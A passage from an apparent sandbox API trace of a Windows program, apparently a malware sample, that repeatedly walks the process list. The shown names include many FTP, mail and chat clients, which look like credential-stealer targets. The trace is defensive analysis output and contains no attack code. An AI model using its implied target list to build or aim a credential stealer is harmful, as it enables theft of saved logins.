cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0261.744] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0261.754] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0261.757] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0261.759] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.761] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.815] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.817] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.819] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.821] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0261.823] CloseHandle (hObject=0x17b0) returned 1 [0261.824] Sleep (dwMilliseconds=0x64) [0261.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0261.957] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.959] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.960] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.962] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.963] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.965] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.967] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.968] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.970] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.971] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.973] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.975] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.976] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.978] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.979] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.012] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.015] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.016] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.018] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.020] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.022] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0262.024] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0262.026] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.029] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.031] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0262.033] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0262.035] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0262.037] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.039] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0262.041] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0262.045] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.047] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.049] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0262.051] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0262.053] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0262.055] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0262.057] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0262.101] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0262.103] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0262.104] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0262.105] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0262.107] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0262.108] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0262.110] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0262.111] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0262.113] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0262.114] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0262.115] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0262.117] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0262.118] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0262.120] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0262.122] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0262.123] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0262.125] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0262.126] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0262.127] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0262.129] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0262.130] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0262.132] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0262.134] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0262.135] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0262.186] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0262.188] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0262.190] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0262.191] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0262.193] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0262.195] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0262.196] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0262.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0262.201] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0262.202] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0262.204] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0262.206] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0262.208] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, 